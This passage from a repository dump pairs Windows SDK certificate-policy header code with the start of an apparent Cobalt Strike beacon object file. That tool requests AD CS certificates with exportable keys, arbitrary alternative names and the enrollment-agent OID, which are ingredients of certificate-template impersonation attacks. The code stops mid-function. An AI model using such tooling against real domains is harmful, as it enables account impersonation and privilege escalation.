            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in const BSTR strConfig);
        
        HRESULT ( STDMETHODCALLTYPE *VerifyRequest )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Context,
            /* [in] */ LONG bNewRequest,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetDescription )( 
            __RPC__in ICertPolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDescription);
        
        HRESULT ( STDMETHODCALLTYPE *ShutDown )( 
            __RPC__in ICertPolicy * This);
        
        END_INTERFACE
    } ICertPolicyVtbl;

    interface ICertPolicy
    {
        CONST_VTBL struct ICertPolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPolicy_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPolicy_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPolicy_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPolicy_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPolicy_Initialize(This,strConfig)	\
    ( (This)->lpVtbl -> Initialize(This,strConfig) ) 

#define ICertPolicy_VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition)	\
    ( (This)->lpVtbl -> VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition) ) 

#define ICertPolicy_GetDescription(This,pstrDescription)	\
    ( (This)->lpVtbl -> GetDescription(This,pstrDescription) ) 

#define ICertPolicy_ShutDown(This)	\
    ( (This)->lpVtbl -> ShutDown(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPolicy_INTERFACE_DEFINED__ */


#ifndef __ICertPolicy2_INTERFACE_DEFINED__
#define __ICertPolicy2_INTERFACE_DEFINED__

/* interface ICertPolicy2 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPolicy2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("3db4910e-8001-4bf1-aa1b-f43a808317a0")
    ICertPolicy2 : public ICertPolicy
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE GetManageModule( 
            /* [retval][out] */ __RPC__deref_out_opt ICertManageModule **ppManageModule) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPolicy2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPolicy2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPolicy2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPolicy2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPolicy2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in const BSTR strConfig);
        
        HRESULT ( STDMETHODCALLTYPE *VerifyRequest )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Context,
            /* [in] */ LONG bNewRequest,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetDescription )( 
            __RPC__in ICertPolicy2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDescription);
        
        HRESULT ( STDMETHODCALLTYPE *ShutDown )( 
            __RPC__in ICertPolicy2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetManageModule )( 
            __RPC__in ICertPolicy2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertManageModule **ppManageModule);
        
        END_INTERFACE
    } ICertPolicy2Vtbl;

    interface ICertPolicy2
    {
        CONST_VTBL struct ICertPolicy2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPolicy2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPolicy2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPolicy2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPolicy2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPolicy2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPolicy2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPolicy2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPolicy2_Initialize(This,strConfig)	\
    ( (This)->lpVtbl -> Initialize(This,strConfig) ) 

#define ICertPolicy2_VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition)	\
    ( (This)->lpVtbl -> VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition) ) 

#define ICertPolicy2_GetDescription(This,pstrDescription)	\
    ( (This)->lpVtbl -> GetDescription(This,pstrDescription) ) 

#define ICertPolicy2_ShutDown(This)	\
    ( (This)->lpVtbl -> ShutDown(This) ) 


#define ICertPolicy2_GetManageModule(This,ppManageModule)	\
    ( (This)->lpVtbl -> GetManageModule(This,ppManageModule) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPolicy2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certpol_0000_0002 */
/* [local] */ 

typedef 
enum X509SCEPMessageType
    {
        SCEPMessageUnknown	= -1,
        SCEPMessageCertResponse	= 3,
        SCEPMessagePKCSRequest	= 19,
        SCEPMessageGetCertInitial	= 20,
        SCEPMessageGetCert	= 21,
        SCEPMessageGetCRL	= 22,
        SCEPMessageClaimChallengeAnswer	= 41
    } 	X509SCEPMessageType;

typedef 
enum X509SCEPDisposition
    {
        SCEPDispositionUnknown	= -1,
        SCEPDispositionSuccess	= 0,
        SCEPDispositionFailure	= 2,
        SCEPDispositionPending	= 3,
        SCEPDispositionPendingChallenge	= 11
    } 	X509SCEPDisposition;

typedef 
enum X509SCEPFailInfo
    {
        SCEPFailUnknown	= -1,
        SCEPFailBadAlgorithm	= 0,
        SCEPFailBadMessageCheck	= 1,
        SCEPFailBadRequest	= 2,
        SCEPFailBadTime	= 3,
        SCEPFailBadCertId	= 4
    } 	X509SCEPFailInfo;



extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0002_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0002_v0_0_s_ifspec;

#ifndef __INDESPolicy_INTERFACE_DEFINED__
#define __INDESPolicy_INTERFACE_DEFINED__

/* interface INDESPolicy */
/* [local][helpstring][uuid][object] */ 


EXTERN_C const IID IID_INDESPolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13CA515D-431D-46CC-8C2E-1DA269BBD625")
    INDESPolicy : public IUnknown
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Uninitialize( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GenerateChallenge( 
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszParams,
            /* [retval][out] */ PWSTR *ppwszResponse) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VerifyRequest( 
            /* [ref][in] */ CERTTRANSBLOB *pctbRequest,
            /* [ref][in] */ CERTTRANSBLOB *pctbSigningCertEncoded,
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [retval][out] */ BOOL *pfVerified) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Notify( 
            /* [ref][in] */ PCWSTR pwszChallenge,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [in] */ X509SCEPDisposition disposition,
            /* [in] */ LONG lastHResult,
            /* [ref][in] */ CERTTRANSBLOB *pctbIssuedCertEncoded) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct INDESPolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            INDESPolicy * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            INDESPolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            INDESPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            INDESPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *Uninitialize )( 
            INDESPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GenerateChallenge )( 
            INDESPolicy * This,
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszParams,
            /* [retval][out] */ PWSTR *ppwszResponse);
        
        HRESULT ( STDMETHODCALLTYPE *VerifyRequest )( 
            INDESPolicy * This,
            /* [ref][in] */ CERTTRANSBLOB *pctbRequest,
            /* [ref][in] */ CERTTRANSBLOB *pctbSigningCertEncoded,
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [retval][out] */ BOOL *pfVerified);
        
        HRESULT ( STDMETHODCALLTYPE *Notify )( 
            INDESPolicy * This,
            /* [ref][in] */ PCWSTR pwszChallenge,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [in] */ X509SCEPDisposition disposition,
            /* [in] */ LONG lastHResult,
            /* [ref][in] */ CERTTRANSBLOB *pctbIssuedCertEncoded);
        
        END_INTERFACE
    } INDESPolicyVtbl;

    interface INDESPolicy
    {
        CONST_VTBL struct INDESPolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define INDESPolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define INDESPolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define INDESPolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define INDESPolicy_Initialize(This)	\
    ( (This)->lpVtbl -> Initialize(This) ) 

#define INDESPolicy_Uninitialize(This)	\
    ( (This)->lpVtbl -> Uninitialize(This) ) 

#define INDESPolicy_GenerateChallenge(This,pwszTemplate,pwszParams,ppwszResponse)	\
    ( (This)->lpVtbl -> GenerateChallenge(This,pwszTemplate,pwszParams,ppwszResponse) ) 

#define INDESPolicy_VerifyRequest(This,pctbRequest,pctbSigningCertEncoded,pwszTemplate,pwszTransactionId,pfVerified)	\
    ( (This)->lpVtbl -> VerifyRequest(This,pctbRequest,pctbSigningCertEncoded,pwszTemplate,pwszTransactionId,pfVerified) ) 

#define INDESPolicy_Notify(This,pwszChallenge,pwszTransactionId,disposition,lastHResult,pctbIssuedCertEncoded)	\
    ( (This)->lpVtbl -> Notify(This,pwszChallenge,pwszTransactionId,disposition,lastHResult,pctbIssuedCertEncoded) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __INDESPolicy_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certpol_0000_0003 */
/* [local] */ 

#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
#pragma endregion


extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0003_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0003_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/ADCS-BOF/src/request/adcs_request.c
================================================
#include <windows.h>
#include <stdio.h>
#include <oleauto.h>
#include <wchar.h>
#include <stdlib.h>
#include <combaseapi.h>
#include "beacon.h"
#include "bofdefs.h"
#include "adcs_request.h"

typedef BSTR WINAPI (*SysAllocString_t)(const OLECHAR *);
typedef UINT WINAPI (*SysStringLen_t)(BSTR);
typedef void WINAPI (*SysFreeString_t)(BSTR);

//#define OLEAUT32$SysAllocString ((SysAllocString_t)DynamicLoad("OLEAUT32$SysAllocString"))
//#define OLEAUT32$SysStringLen ((SysStringLen_t)DynamicLoad("OLEAUT32$SysStringLen"))
//#define OLEAUT32$SysFreeString ((SysFreeString_t)DynamicLoad("OLEAUT32$SysFreeString"))

typedef HRESULT WINAPI (*CoInitializeEx_t)(LPVOID pvReserved, DWORD dwCoInit);
typedef HRESULT WINAPI (*CoUninitialize_t)(void);

//#define OLE32$CoInitializeEx ((CoInitializeEx_t)DynamicLoad("OLE32$CoInitializeEx"))
//#define OLE32$CoUninitialize ((CoUninitialize_t)DynamicLoad("OLE32$CoUninitialize"))


#define IsNullOrEmptyW(str) \
(( NULL == str ) || ( 0 == MSVCRT$wcslen(str) ))
#define CHECK_RETURN_NULL( function, return_value, result) \
	if (NULL == return_value) \
	{ \
		result = E_INVALIDARG; \
		BeaconPrintf(CALLBACK_ERROR, "%s failed\n", function); \
		goto fail; \
	}
#define BETTER_CHECK_RETURN_FAIL(x) { \
	HRESULT hr = x; \
	if(FAILED(hr)) \
	{ \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", #x, hr); \
		goto fail; \
	} \
}

#define CHECK_RETURN_FAIL( function, result ) \
	if (FAILED(result)) \
	{ \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
		goto fail; \
	}
#define CHECK_RETURN_FALSE( function, result ) \
	if (FALSE == (BOOL)result) \
	{ \
		result = KERNEL32$GetLastError(); \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: %lu\n", function, (DWORD)result); \
		result = HRESULT_FROM_WIN32(result); \
		goto fail; \
	}	
#define SAFE_RELEASE( interfacepointer )	\
	if ( (interfacepointer) != NULL )	\
	{	\
		(interfacepointer)->lpVtbl->Release(interfacepointer);	\
		(interfacepointer) = NULL;	\
	}
#define SAFE_SYS_FREE( string_ptr )	\
	if ( (string_ptr) != NULL )	\
	{	\
		OLEAUT32$SysFreeString(string_ptr);	\
		(string_ptr) = NULL;	\
	}	
#define SAFE_LOCAL_FREE( local_ptr ) \
	if (local_ptr) \
	{ \
		KERNEL32$LocalFree(local_ptr); \
		local_ptr = NULL; \
	}
#define SAFE_INT_FREE( int_ptr ) \
	if (int_ptr) \
	{ \
		intFree(int_ptr); \
		int_ptr = NULL; \
	}		



#define PRIVATE_KEY_LENGTH 2048
#define CERT_REQUEST_TIMEOUT 3000
#define CERT_REQUEST_RETRIES 3


HRESULT _adcs_request_CreatePrivateKey(BOOL bMachine, IX509PrivateKey ** lppPrivateKey)
{
	HRESULT	hr = S_OK;
	BSTR bstrProviderName = NULL;

	CLSID CLSID_CX509PrivateKey = { 0x884e200c, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IX509PrivateKey = { 0x728ab30c, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	
	SAFE_RELEASE(*lppPrivateKey);
	hr = OLE32$CoCreateInstance(&CLSID_CX509PrivateKey, NULL, CLSCTX_INPROC_SERVER, &IID_IX509PrivateKey, (LPVOID *)(lppPrivateKey));
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509PrivateKey)", hr);

	// Force CAPI provider for PFX export compatibility
	bstrProviderName = OLEAUT32$SysAllocString(MS_ENHANCED_PROV_W);
	hr = (*lppPrivateKey)->lpVtbl->put_ProviderName((*lppPrivateKey), bstrProviderName);
	CHECK_RETURN_FAIL("put_ProviderName", hr);

	hr = (*lppPrivateKey)->lpVtbl->put_ProviderType((*lppPrivateKey), XCN_PROV_RSA_FULL);
	CHECK_RETURN_FAIL("put_ProviderType", hr);

	hr = (*lppPrivateKey)->lpVtbl->put_Length((*lppPrivateKey), PRIVATE_KEY_LENGTH);
	CHECK_RETURN_FAIL("put_Length", hr);

	hr = (*lppPrivateKey)->lpVtbl->put_KeySpec((*lppPrivateKey), XCN_AT_KEYEXCHANGE);
	CHECK_RETURN_FAIL("put_KeySpec", hr);

	hr = (*lppPrivateKey)->lpVtbl->put_KeyUsage((*lppPrivateKey), XCN_NCRYPT_ALLOW_ALL_USAGES);
	CHECK_RETURN_FAIL("put_KeyUsage", hr);

	hr = (*lppPrivateKey)->lpVtbl->put_MachineContext((*lppPrivateKey), (bMachine?VARIANT_TRUE:VARIANT_FALSE));
	CHECK_RETURN_FAIL("put_MachineContext", hr);

	hr = (*lppPrivateKey)->lpVtbl->put_ExportPolicy((*lppPrivateKey), XCN_NCRYPT_ALLOW_EXPORT_FLAG | XCN_NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG);
	CHECK_RETURN_FAIL("put_ExportPolicy", hr);

	hr = (*lppPrivateKey)->lpVtbl->Create((*lppPrivateKey));
	CHECK_RETURN_FAIL("Create", hr);

	hr = S_OK;

fail:
	SAFE_SYS_FREE(bstrProviderName);

	return hr;
} // end _adcs_request_CreatePrivateKey


HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivateKey, BSTR bstrTemplate, BSTR bstrSubject, BSTR bstrAltName, BSTR bstrAltUrl, IX509CertificateRequestPkcs10V3 ** lppCertificateRequestPkcs10V3, BOOL addAppPolicy, BOOL dns)
{
	HRESULT	hr = S_OK;
	IX500DistinguishedName * pDistinguishedName = NULL;
	IAlternativeName * pAlternativeName = NULL;
	IAlternativeNames * pAlternativeNames = NULL;
	IX509ExtensionAlternativeNames * pExtensionAlternativeNames = NULL;
	IX509Extension * pExtension = NULL;
	IX509Extensions * pExtensions = NULL;
	IX509NameValuePair * pAltNameValuePair = NULL;
	IX509NameValuePairs * pNameValuePairs = NULL;
	IX509ExtensionTemplateName * pTemplateName = NULL;
	IX509ExtensionMSApplicationPolicies * pMSAppPolicies = NULL;
	ICertificatePolicies * certPolicies = NULL;
	ICertificatePolicy * certPolicy = NULL;
	ICertificatePolicy * certPolicyReqAgent = NULL;
	IObjectId * objectId_POLICIES = NULL;
	IObjectId * objectId_ALLOW_CLIENT = NULL;
	IObjectId * objectid_CERTAGENT = NULL;
	BSTR bstrAltNameValuePairName = NULL;
	BSTR bstrAltNameValuePairValue = NULL;
	BSTR OID_APP_CERT_POLICY_ALLOW_CLIENT = NULL;
	WCHAR swzAltNamePairValue[MAX_PATH];
	LONG index = 0;
	
	BSTR OID_APP_CERT_POLICIES = OLEAUT32$SysAllocString(L"1.3.6.1.4.1.311.21.10");
	BSTR OID_APP_CERTAGENT = OLEAUT32$SysAllocString(L"1.3.6.1.4.1.311.20.2.1");
	
	CLSID CLSID_CX509CertificateRequestPkcs10 = { 0x884e2042, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IX509CertificateRequestPkcs10V3 = { 0x54EA9942, 0x3D66, 0x4530, {0XB7, 0X6E, 0x7C, 0x91, 0x70, 0xD3, 0xEC, 0x52} };

	CLSID CLSID_CX500DistinguishedName = { 0x884e2003, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IX500DistinguishedName = { 0x728ab303, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	CLSID CLSID_CAlternativeName = { 0x884e2013, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IAlternativeName = { 0x728ab313, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	CLSID CLSID_CAlternativeNames = { 0x884e2014, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IAlternativeNames = { 0x728ab314, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	CLSID CLSID_CX509ExtensionAlternativeNames = { 0x884e2015, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IX509ExtensionAlternativeNames = { 0x728ab315, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	IID IID_IX509Extension = { 0x728ab30d, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	CLSID CLSID_CX509NameValuePair = { 0x884e203f, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IX509NameValuePair = { 0x728ab33f, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	CLSID  CLSID_CX509ExtensionMSApplicationPolicies = {0x884e2021,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	IID IID_IX509ExtensionMSApplicationPolicies = {0x728ab321,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};

	CLSID CLSID_CCertificatePolicy = {0x884e201e,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	IID IID_ICertificatePolicy = {0x728ab31e,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};

	CLSID CLSID_CCertificatePolicies = {0x884e201f,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	IID IID_ICertificatePolicies = {0x728ab31f,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};

	CLSID CLSID_CObjectId = {0x884e2000,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	IID IID_IObjectId = {0x728ab300,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};

	CLSID CLSID_EKU = {0x884e2010,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	IID IID_EKU = {0x728ab310,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};

	CLSID CLSID_TemplateName = {0x884e2011,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	IID IID_TemplateName = {0x728ab311,0x217d,0x11da,{0xb2,0xa4,0x00,0x0e,0x7b,0xbb,0x2b,0x09}};
	
	// Create an instance of the CX509CertificateRequestPkcs10 class with the IX509CertificateRequestPkcs10V2 interface
	SAFE_RELEASE((*lppCertificateRequestPkcs10V3));
	hr = OLE32$CoCreateInstance(&CLSID_CX509CertificateRequestPkcs10, NULL, CLSCTX_INPROC_SERVER, &IID_IX509CertificateRequestPkcs10V3, (LPVOID *)lppCertificateRequestPkcs10V3);
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509CertificateRequestPkcs10)", hr);

	// Initializes the certificate request by using the template name
	hr = (*lppCertificateRequestPkcs10V3)->lpVtbl->InitializeFromPrivateKey((*lppCertificateRequestPkcs10V3), (bMachine?ContextMachine:ContextUser), pPrivateKey, bstrTemplate);
	CHECK_RETURN_FAIL("(*lppCertificateRequestPkcs10V3)->lpVtbl->InitializeFromTemplateName()", hr);

	// Create an instance of the CX500DistinguishedName class with the IX500DistinguishedName interface
	SAFE_RELEASE(pDistinguishedName);
	hr = OLE32$CoCreateInstance(&CLSID_CX500DistinguishedName, NULL, CLSCTX_INPROC_SERVER, &IID_IX500DistinguishedName, (LPVOID *)&(pDistinguishedName));
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX500DistinguishedName)", hr);

	hr = OLE32$CoCreateInstance(&CLSID_CObjectId, NULL, CLSCTX_INPROC_SERVER, &IID_IObjectId, (LPVOID *) &objectId_POLICIES);
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_OBJECTID)", hr);

		hr = OLE32$CoCreateInstance(&CLSID_CObjectId, NULL, CLSCTX_INPROC_SERVER, &IID_IObjectId, (LPVOID *) &objectId_ALLOW_CLIENT);
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_OBJECTID)", hr);

	BETTER_CHECK_RETURN_FAIL(OLE32$CoCreateInstance(&CLSID_CObjectId, NULL, CLSCTX_INPROC_SERVER, &IID_IObjectId, (LPVOID *) &objectid_CERTAGENT));
	

	// Encode the subject name
	hr = pDistinguishedName->lpVtbl->Encode(pDistinguishedName, bstrSubject, XCN_CERT_NAME_STR_NONE);
	if (FAILED(hr))
	{
		hr = pDistinguishedName->lpVtbl->Encode(pDistinguishedName, bstrSubject, XCN_CERT_NAME_STR_SEMICOLON_FLAG);
		CHECK_RETURN_FAIL("pDistinguishedName->lpVtbl->Encode(XCN_CERT_NAME_STR_SEMICOLON_FLAG)", hr);
	}
	
	// Set the subject
	hr = (*lppCertificateRequestPkcs10V3)->lpVtbl->put_Subject((*lppCertificateRequestPkcs10V3), pDistinguishedName);
	CHECK_RETURN_FAIL("(*lppCertificateRequestPkcs10V3)->lpVtbl->put_Subject()", hr);

	// Set the alt name
